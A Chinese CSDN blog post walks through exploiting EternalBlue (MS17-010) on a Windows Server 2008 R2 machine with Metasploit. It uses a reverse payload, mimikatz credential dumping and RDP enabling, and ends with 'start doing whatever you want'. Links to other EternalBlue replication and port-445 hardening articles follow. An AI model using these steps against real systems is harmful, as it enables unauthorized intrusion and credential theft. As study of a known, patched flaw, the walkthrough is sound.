永恒之蓝445 拿下服务器

最新推荐文章于 2024-05-31 07:23:48 发布
最新推荐文章于 2024-05-31 07:23:48 发布
阅读量5.9k 收藏
点赞数
文章标签: 服务器 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hussu/article/details/123390612
版权

上文提到内网渗透的时候发现服务器开启了445 接口

目标系统windows server 2008R2 x64
首先ping目标ip,连接通畅
使用service postgresql restart开启postgresql数据库

msfdb init初始化msf框架
msfconsole 打开msf控制台

msf框架db_nmap扫描端口得知目标开启了445端口,445为高危漏洞 ,可能存在永恒之蓝漏洞
search ms17(永恒之蓝编号)查找auxiliary验证payload
验证表明有很大几率存在永恒之蓝

search ms17 选择exploits攻击模块,为防止目标防火墙拦截通过show payloads 寻找reverse反向payload

set payload替换反弹payload
options设置lhost本地反弹链接
run启动

攻击成功。getuid查看获得 system权限
load mimikatz 加载猕猴桃板块使用kerberos抓取权限 获取到账户密码

background 将会话放到后台

nmap扫3389端口发现未开放

seaech enable_rdp (3389专用post后渗透攻击模块)
options设置session
run执行
nmap扫描ip发现3389已开
rdesktop 目标ip 用账户名密码远程登录成功….开始为所欲为

hussu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
避免永恒之病毒,关闭445等危险端口
02-01
避免永恒之病毒,关闭445等危险端口。修改文件后缀为bat,右键以管理员身份运行即可。
永恒之检测.zip
10-20
"永恒之"是2017年全球范围内爆发的一种著名勒索软件——WannaCry(想哭)的一部分,其主要利用了微软Windows系统中的SMB(Server Message Block)服务漏洞进行传播。该漏洞编号为MS17-010,影响了未打补丁的...
MS17-010 漏洞永恒之445漏洞复现
qq_46400462的博客
05-01 1044
前言 这里使用kali中的Metasploit 主要利用445端口的漏洞 首先需要一台win7作为目标靶机 (不只是win7可以) 启用Metasploit mfsconsole 1.查找漏洞模块 search MS17-010 查找MS17-010漏洞 2.使用anxiliary模块的scanner use 3 使用anxiliary模块的scanner扫描目标是否存在MS17-010漏洞 3.查看模块相关参数 show options 其中required为yes的为必要的参数 4.设置目标主机 .
Kali--MSF-永恒之详解(复现、演示、远程、后门、加壳、修复)
最新发布
dzqxwzoe的博客
05-31 1036
永恒之(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
永恒之漏洞原理 445_新代码漏洞“永恒之黑”该如何警惕?
weixin_39607836的博客
11-30 549
中科天齐公司是在中科院计算技术研究所的大力推动下,以中科院计算所国际领先的自主研究成果“软件代码漏洞检测修复平台(Wukong悟空)”为基础组建的高新技术企业。北京时间3月12日,针对最新披露的SMB远程代码执行漏洞(CVE-2020-0796),微软官方发布了针对Windows 10/Server禁用SMBv3(SMB 3.1.1版本)协议压缩的安全指南公告,旨在缓解该漏洞所造成的威胁。随即...
勒索病毒“永恒之”变种再来,该如何关闭445端口(收藏)
dezhen7792的博客
05-16 727
最近新出现一种网络病毒,很多用户深受其害,笔者也很担心会中招。但关于如何关闭445端口,自己不是很会。但幸好,贴心正义的大有人在。有人整理了保护电脑安全的几个方法步骤来共享。笔者就不客气收藏了。 以下为转载内容。 大量Windows用户文档受到永恒之病毒及变种攻击。你可能突然发现文档、图片、音乐、zip甚至ex...
永恒之 利用(复现)
nszmsjhshs的博客
03-11 6557
永恒之早在2017年4月15日黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之”工具,“永恒之”是利用Windows系统的SMB(445)漏洞可以跳过密码直接获取系统最高权限。这还没让我们对它得到重视,然而随后发生的一件事让它就此名声大噪或者说臭名昭著,那就是用它加以改造的wannacry 勒索病毒。它刚一出现就引起波然大动,全球各国都有地方受到攻击。被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支
永恒之实验工具.rar
07-19
最原始的利用版本
永恒之病毒处理方法
04-10
永恒之病毒处理方法,电脑自动重启和屏,过一段时间又重启
永恒之测试.docx
07-23
"Kali 永恒之测试指南" 在这篇文章中,我们将详细介绍 Kali Linux 中的永恒之测试步骤,适合新手观看。永恒之是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,...
使用ms17-010对win7进行渗透(445永恒之
weixin_30783629的博客
05-23 1086
永恒之是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之”工具,“永恒之”利用Windows系统的SMB漏洞可以获取系统最高权限。 该实验在虚拟机下进行 kali ip地址:192.168.146.132 win7 64位 (需要关闭防...
445端口攻击详解/教学
03-22
445端口攻击 详解/教学 仅供教学。 后果自承,私人收藏
kali (永恒之MS17_010)漏洞复现
菜菜的博客
05-25 2046
8步完成get shell,需要的机子:渗透机(Linux(kali)一台),靶机(server 2008一台),简单的配置,就可以开始攻击了
[ MSF使用实例 ] 利用永恒之(MS17-010)漏洞导致windows靶机屏并获取靶机权限
wwwwyyyrre的博客
04-22 2417
永恒之(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
qq_50854662的博客
05-16 5879
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利
渗透之metasploit技术-端口扫描,漏洞利用
weixin_44255856的博客
07-31 6600
一,使用主机模块进行端口扫描 启用metasploit msfconsole 检查有哪些可用端口。 search portscan 使用TCP扫描模块并检查有那些参数需要设置。 use [模板] show options 设置待扫描的IP地址(RHOSTS),设置扫描的端口范围(PORTS),设置扫描的线程(THREADS),最后使用show options查看设置的参数。run,运行。...
永恒之漏洞复现(详细版)
Zqinglele的博客
03-20 2420
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
永恒之 argument required
04-12
永恒之(EternalBlue)是一种利用Windows操作系统漏洞的网络攻击工具。它最初是由美国国家安全局(NSA)开发的,用于进行网络侦察和渗透测试。然而,该工具在2017年被黑客组织“影子经纪人”(Shadow Brokers)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值